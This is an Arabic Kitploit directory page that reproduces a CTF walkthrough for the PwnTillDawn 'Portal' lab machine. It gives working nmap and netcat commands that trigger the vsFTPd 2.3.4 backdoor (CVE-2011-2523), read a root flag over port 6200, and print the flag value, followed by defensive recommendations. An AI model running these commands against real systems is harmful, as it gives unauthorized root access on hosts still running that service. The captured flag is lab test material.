Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PwnTillDawn-Portal-Walkthrough — دليل تفصيلي لاختبار الاختراق وتقرير استغلال لجهاز 'Portal'، مع التركيز على CVE-2011-2523 (ثغرة vsFTPd 2.3.4 الخلفية) للحصول على صلاحيات الجذر (root). | Kitploit
أدوات/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

دليل تفصيلي لاختبار الاختراق وتقرير استغلال لجهاز 'Portal'، مع التركيز على CVE-2011-2523 (ثغرة vsFTPd 2.3.4 الخلفية) للحصول على صلاحيات الجذر (root).

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

🔐 تقييم الثغرات واختبار الاختراق (VAPT)

📌 المشروع: دليل استغلال الهدف

⚠️ هذا المشروع مخصص لأغراض تعليمية واختبارية مرخصة فقط.
الوصول غير المصرح به إلى الأنظمة محظور تمامًا.


👨‍💻 المؤلف

سيافيق
الدور: مختبر اختراق رئيسي


🎯 معلومات الهدف

  • عنوان IP للهدف: 10.150.150.12
  • نظام التشغيل: Ubuntu Linux
  • الحالة: 🔴 حرج (تم اكتشاف باب خلفي)
  • الثغرة: CVE-2011-2523 (باب خلفي لـ vsFTPd)

🧭 نظرة عامة على الهجوم

المرحلةالأداةالوصف
الاكتشافNmapمسح الشبكة للعثور على الأجهزة النشطة
التعدادNmapتحديد الخدمات والإصدارات
التحليلNSE Scriptكشف الثغرة المعروفة
الاستغلالNetcatتشغيل الباب الخلفي
ما بعد الاستغلالTerminalالحصول على صلاحيات الجذر واسترجاع العلم

🚀 دليل خطوة بخطوة

🔍 الخطوة 1: الاستطلاع الشبكي

مسح الأجهزة النشطة في الشبكة:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ النتيجة:

  • تم اكتشاف 8 أجهزة
  • تم تحديد الهدف: 10.150.150.12

🔎 الخطوة 2: تعداد الخدمات

مسح المنافذ والخدمات المفتوحة:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ النتائج:

  • المنفذ 21 → FTP (vsftpd)
  • المنفذ 22 → SSH (OpenSSH 8.2p1)

⚠️ الخطوة 3: فحص الثغرات

التحقق من وجود ثغرة الباب الخلفي المعروفة في FTP:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 النتيجة:

  • الهدف ضعيف (VULNERABLE)
  • تم تأكيد CVE-2011-2523

💣 الخطوة 4: الاستغلال

تشغيل الباب الخلفي باستخدام اسم مستخدم ضار:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ هذا يفتح واجهة أوامر مخفية بصلاحيات الجذر على المنفذ 6200

🔓 الخطوة 5: الحصول على الوصول (واجهة الجذر)

الاتصال بالباب الخلفي وتنفيذ الأوامر:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ النتيجة:

  • تم الحصول على صلاحيات الجذر
  • تم تأكيد uid=0(root)

🏁 تم التقاط العلم:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 الدروس المستفادة

  • احرص دائمًا على تحديث الخدمات القديمة (vsFTPd كان ضعيفًا)
  • الخدمات غير المهيأة بشكل صحيح قد تؤدي إلى اختراق كامل للنظام
  • الفحوصات البسيطة يمكن أن تكشف ثغرات حرجة

🛡️ التوصيات

  • 🔄 قم بتحديث خدمة FTP إلى أحدث إصدار
  • 🚫 قم بتعطيل الخدمات غير الضرورية
  • 🔐 استخدم جدار حماية لتقييد الوصول
  • 📊 قم بإجراء مراجعات أمنية منتظمة

📚 إخلاء المسؤولية

هذا المشروع مصمم بدقة من أجل:

  • تعلم الأمن السيبراني
  • ممارسة الاختراق الأخلاقي
  • اختبار الاختراق المرخص

❌ لا تستخدم هذه المعرفة في أنشطة غير قانونية.

⭐ ملاحظة ختامية

"الأمان ليس منتجًا، بل عملية." — اختبر وراقب وحسّن دائمًا.

تنزيل الأداة